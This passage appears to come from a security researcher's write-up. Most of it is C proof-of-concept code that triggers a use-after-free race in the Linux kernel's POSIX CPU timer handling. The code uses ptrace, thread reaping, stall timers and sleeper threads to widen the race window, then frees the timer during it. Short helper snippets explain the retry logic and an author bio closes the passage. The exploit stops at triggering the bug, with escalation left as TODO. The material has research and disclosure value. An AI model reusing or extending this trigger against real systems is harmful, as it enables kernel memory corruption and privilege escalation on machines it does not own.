// Can overflow if `NUM_SAMPLES` is too high, but with simple syscalls,
// this works just fine
long int getpid_cpu_usage() {
    struct timespec *ts = malloc(NUM_SAMPLES * sizeof(struct timespec));

    // If we don't have `clock_gettime` avg CPU time usage, get it now
    if (clock_gettime_avg == 0) {
        for (int i = 0; i < NUM_SAMPLES; i++) {
            syscall(__NR_clock_gettime, CLOCK_THREAD_CPUTIME_ID, &ts[i]);
        } 
    
        long int total_nsec = 0;
    
        for (int i = 0; i < NUM_SAMPLES-1; i++) {
            long int time_taken = (long int)(ts_to_ns(&ts[i + 1]) - ts_to_ns(&ts[i]));
            total_nsec += time_taken;
        }
    
        clock_gettime_avg = total_nsec / (NUM_SAMPLES-1);
    }

    for (int i = 0; i < NUM_SAMPLES; i++) {
        syscall(__NR_clock_gettime, CLOCK_THREAD_CPUTIME_ID, &ts[i]);
        syscall(__NR_getpid);
    }

    long int total_nsec = 0;
    for (int i = 0; i < NUM_SAMPLES-1; i++) {
        long int time_taken = (long int)(ts_to_ns(&ts[i + 1]) - ts_to_ns(&ts[i])) - clock_gettime_avg;
        total_nsec += time_taken;
    }

    free(ts);
    return total_nsec / (NUM_SAMPLES-1);
}

/* Global variables for exploit setup START */
pthread_barrier_t barrier;

// Timers used to stall `handle_posix_cpu_timers()` to extend the race window
timer_t stall_timers[NUM_TIMERS];
timer_t uaf_timer;

// Thread that will trigger the timer handling, and also the thread that will
// be reaped by the exploit parent process
pthread_t reapee_thread;

int e2w[2]; // exploit process to wrapper process comm pipefds
int c2p[2]; // child to parent comm pipefds
int p2c[2]; // parent to child comm pipefds
int stall_fds[2]; // stall pipe fds for the sleep func

// Amount of LESS times to loop the `getpid()` syscall to waste CPU time
int syscall_loop_times = 20;
int retry_count = 0;
/* Global variables for exploit setup END */

void reapee_func(void) {
    // Pin to same CPU as sleeper threads
    pin_on_cpu(2);
    struct sigevent sev = {0};
    sev.sigev_notify = SIGEV_SIGNAL;
    sev.sigev_signo = SIGUSR1;
    char m;

    prctl(PR_SET_NAME, "REAPEE");

    // Send this thread's TID to the parent process
    pid_t tid = (pid_t)syscall(SYS_gettid);
    SYSCHK(write(c2p[1], &tid, sizeof(pid_t)));

    // Wait for parent to attach and continue
    pthread_barrier_wait(&barrier); // barrier 1

    // Create the maximum amount of timers minus one
    for (int i = 0; i < NUM_TIMERS; i++) {
        SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &stall_timers[i]));
    }

    // Create the UAF timer as the last timer
    SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &uaf_timer));

    // Wait for the main thread to arm the timers. This is to make sure
    // this thread does not use CPU time to arm the timers.
    pthread_barrier_wait(&barrier); // barrier 2
    pthread_barrier_wait(&barrier); // barrier 3

    // Waste just the right amount of CPU time now without firing any of the timers
    for (int i = 0; i < ((ONE_MS_NS / getpid_avg) - syscall_loop_times); i++) {
        syscall(__NR_getpid);
    }

    // This `return` will trigger `do_exit()` in the kernel, which hopefully will
    // fire the timers after `exit_notify()` wakes up the `waitpid()` in the exploit
    // parent process
    return;
}

void sleep_func(void) {
    // same CPU as REAPEE thread
    pin_on_cpu(2);
    char m;

    prctl(PR_SET_NAME, "SLEEPER");

    // Block and sleep without using the CPU
    read(stall_fds[0], &m, 1);
}

int main(int argc, char *argv[]) {
    // Loop for wrapper process
    while (1) {
        // Wrapper process setup
        printf("Wrapper: try %d\n", ++retry_count);
        SYSCHK(pipe(e2w));
        pid_t exploit_pid = SYSCHK(fork());

        if (exploit_pid) {
            // wrapper process (pinning CPU here doesn't matter)
            char m;
            close(e2w[1]);

            // Blocking read until retry
            int read_count = read(e2w[0], &m, 1);

            // If read_count > 0, retry
            if (read_count == 0) break;

            // Loop one fewer time on the next retry (by increasing
            // `syscall_loop_times`), wrapping back to 20 once it goes
            // past SYSCALL_LOOP_TIMES_MAX
            syscall_loop_times++;
            syscall_loop_times %= SYSCALL_LOOP_TIMES_MAX+1;
            syscall_loop_times = syscall_loop_times == 0 ? 20 : syscall_loop_times;

            // Close pipes so they can be recreated again
            close(e2w[0]);

            // Wait for exploit to exit
            waitpid(exploit_pid, NULL, __WALL);
        } else {
            // exploit process
            char m;
            close(e2w[0]);

            // Parent and child setup
            // Use pipes to communicate between parent and child
            SYSCHK(pipe(c2p));
            SYSCHK(pipe(p2c));

            // Get the average CPU time usage of the `getpid()` syscall, so we
            // can use it for the trigger later
            getpid_avg = getpid_cpu_usage();

            pid_t pid = SYSCHK(fork());
            
            if (pid) {
                // exploit parent process
                pin_on_cpu(1);
                char m;
                close(c2p[1]);
                close(p2c[0]);

                prctl(PR_SET_NAME, "EXPLOIT_PARENT");

                // Receive child process's REAPEE thread's TID
                pid_t tid;
                SYSCHK(read(c2p[0], &tid, sizeof(pid_t)));

                // Attach to the REAPEE thread and continue it
                SYSCHK(ptrace(PTRACE_ATTACH, tid, NULL, NULL));
                SYSCHK(waitpid(tid, NULL, __WALL));
                SYSCHK(ptrace(PTRACE_CONT, tid, NULL, NULL));

                // Signal to child that we attached and continued
                SYSCHK(write(p2c[1], &m, 1));

                // Reap the REAPEE thread now. This will block and wait until
                // the REAPEE thread is able to get through `exit_notify()` and
                // wake this parent process up.
                SYSCHK(waitpid(tid, NULL, __WALL));
                
                // At this point, if the UAF timer fired at the right time, the REAPEE thread
                // will be reaped while its `tsk->exit_state` is set to `EXIT_ZOMBIE`.
                //
                // Let the child process know REAPEE is reaped, so it can delete the
                // timer.
                SYSCHK(write(p2c[1], &m, 1));
                
                // Let the child process delete and free the timer, and
                // all threads before exiting
                SYSCHK(read(c2p[0], &m, 1));

                // Signal to wrapper process to retry and exit
                // TODO exploit: Figure out how to detect if we triggered UAF here
                SYSCHK(write(e2w[1], &m, 1));

                // Wait for child to exit before exiting
                waitpid(pid, NULL, __WALL);
                close(e2w[1]);
                close(c2p[0]);
                close(p2c[1]);
                exit(0);
            } else {
                // exploit child process
                pin_on_cpu(0);
                char m;
                close(c2p[0]);
                close(p2c[1]);

                // Pipefd for sleep threads to block on
                SYSCHK(pipe(stall_fds));

                // Block SIGUSR1; threads created after this point inherit the mask
                sigset_t mask;
                sigemptyset(&mask);
                sigaddset(&mask, SIGUSR1);
                sigprocmask(SIG_BLOCK, &mask, NULL);

                prctl(PR_SET_NAME, "EXPLOIT_CHILD");
                pthread_barrier_init(&barrier, NULL, 2);
                
                // Change this depending on KASAN vs no KASAN
                int num_sleep_threads = NUM_SLEEP_THREADS;
                pthread_t sleep_threads[num_sleep_threads];

                SYSCHK(pthread_create(&reapee_thread, NULL, (void*)reapee_func, NULL));

                for (int i = 0; i < num_sleep_threads; i++) {
                    int ret = pthread_create(&sleep_threads[i], NULL, (void*)sleep_func, NULL);
                    if (ret != 0) {
                        // If this condition is reached, change `num_sleep_threads` above
                        printf("Failed on thread %d\n", i+1);
                        num_sleep_threads = i;
                        break;
                    }
                }

                // Wait for all threads to be created and go to sleep
                usleep(10 * 1000);

                // Parent process writes to us when attached and continued, use
                // a barrier to continue the REAPEE thread now
                SYSCHK(read(p2c[0], &m, 1));
                pthread_barrier_wait(&barrier); // barrier 1

                // Wait for timers to be created by REAPEE thread
                pthread_barrier_wait(&barrier); // barrier 2

                // Arm the stall timers first, so that they all expire 1ns of CPU
                // time before the UAF timer
                struct itimerspec ts = {
                    .it_interval = {0, 0},
                    .it_value = {
                        .tv_sec = 0,
                        .tv_nsec = ONE_MS_NS - 1,
                    },
                };

                for (int i = 0; i < NUM_TIMERS; i++) {
                    timer_settime(stall_timers[i], 0, &ts, NULL);
                }

                // Arm the UAF timer so that it expires last
                ts.it_value.tv_nsec = ONE_MS_NS;
                timer_settime(uaf_timer, 0, &ts, NULL);

                // Timers are armed, let REAPEE thread continue
                pthread_barrier_wait(&barrier); // barrier 3

                // Parent process writes to us when waitpid() returns successfully.
                //
                // At this point, if we won the race, `handle_posix_cpu_timers()` will be in
                // the race window, and `timer_delete()` should see a NULL `sighand`, which 
                // will cause it to just free the timer unconditionally.
                SYSCHK(read(p2c[0], &m, 1));

                // The race window is open for at least 3ms generally, so we can sleep
                // 1ms to increase our chances to hit it with our free here.
                //
                // Might need to modify this for different systems, because it depends on
                // how much time the race window is open for. KASAN will also not allow
                // as many sleeper threads, so this will need to be lowered a bit if it's
                // enabled.
                usleep(1 * 1000);
                timer_delete(uaf_timer);
                
                // Let the timer be freed by RCU, then let the parent process know it can exit
                wait_for_rcu();

                // At this point, either the UAF triggered, and you'll see the kernel warning
                // or KASAN splat, or we failed. 
                //
                // TODO exploit: Figure out how to detect if we won the race here
                for (int i = 0; i < num_sleep_threads; i++) {
                    write(stall_fds[1], &m, 1);
                }
                for (int i = 0; i < num_sleep_threads; i++) {
                    pthread_join(sleep_threads[i], NULL);
                }

                // Signal to parent to exit
                SYSCHK(write(c2p[1], &m, 1));

                // Close our pipe ends and exit
                close(c2p[1]);
                close(p2c[0]);
                close(stall_fds[0]);
                close(stall_fds[1]);
                exit(0);
            }
        }
    }

    // If we break out of the while loop above, the race was won
    // TODO exploit:
    exit(0);
}
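
The retry bookkeeping in the wrapper branch of `main()` is easy to misread, so here is a minimal sketch of just that arithmetic. `LOOP_TIMES_MAX` is a hypothetical stand-in for `SYSCALL_LOOP_TIMES_MAX` (the real value lives elsewhere in `poc.c`), and `next_loop_times()` and `print_schedule()` are illustrative helpers that do not exist in the PoC.

```c
#include <assert.h>
#include <stdio.h>

/* Hypothetical values: the real constants are defined elsewhere in poc.c. */
#define LOOP_TIMES_MAX   25 /* stand-in for SYSCALL_LOOP_TIMES_MAX */
#define LOOP_TIMES_RESET 20 /* value the PoC falls back to after wrapping */

/* Returns the loop count to use on the next retry, mirroring the
 * three statements in the wrapper process. */
int next_loop_times(int cur) {
    assert(cur >= 0);
    cur++;                     /* one more iteration per retry */
    cur %= LOOP_TIMES_MAX + 1; /* becomes 0 once it passes the maximum */
    return cur == 0 ? LOOP_TIMES_RESET : cur;
}

/* Prints the loop count used for each of the first `n` tries. */
void print_schedule(int start, int n) {
    int v = start;
    for (int i = 0; i < n; i++) {
        printf("try %d: %d\n", i + 1, v);
        v = next_loop_times(v);
    }
}
```

With these stand-in values, calling `print_schedule(20, 7)` walks through 20, 21, 22, 23, 24, 25 and then wraps back to 20, so the count sweeps a small range of values instead of growing without bound.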

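The wrapper decides whether to retry purely from the return value of `read(e2w[0], &m, 1)`: one byte means the exploit process asked for another attempt, while 0 means every write end was closed without anything being written. The sketch below isolates that pattern. `run_child_and_read()` is a hypothetical helper and not part of the PoC; it only assumes a POSIX system with `fork()` and `pipe()`.

```c
#include <assert.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * Forks a child that either writes one byte to a pipe (send_byte != 0)
 * or exits without writing. Returns what read() saw in the parent:
 * 1 if a byte arrived, 0 on EOF, -1 on error.
 */
int run_child_and_read(int send_byte) {
    int fds[2];
    if (pipe(fds) == -1) return -1;

    pid_t pid = fork();
    if (pid == -1) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }

    if (pid == 0) {
        /* Child: plays the role of the exploit process. */
        close(fds[0]);
        if (send_byte) {
            char m = 'r';
            if (write(fds[1], &m, 1) != 1) _exit(1);
        }
        _exit(0); /* exiting closes the child's write end */
    }

    /* Parent: plays the role of the wrapper. It has to close its own
     * copy of the write end, otherwise read() would never return EOF. */
    close(fds[1]);
    char m;
    ssize_t n = read(fds[0], &m, 1);
    assert(n <= 1); /* we asked for at most one byte */
    close(fds[0]);
    waitpid(pid, NULL, 0);
    return (int)n;
}
```

This is why the wrapper calls `close(e2w[1])` before its blocking read: if it kept the write end open, an exploit process that died without writing would leave the wrapper blocked forever instead of breaking out of the loop.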
Hello! I am Faraz. I'm a Lead Security Researcher at Zellic, focusing on L1 blockchain security.

Prior to this, I was a vulnerability researcher in Dataflow Security, where I focused on Chrome and the Android userland.

I still dabble in vulnerability research in my free time! You can find out what I'm up to recently by following me on X.
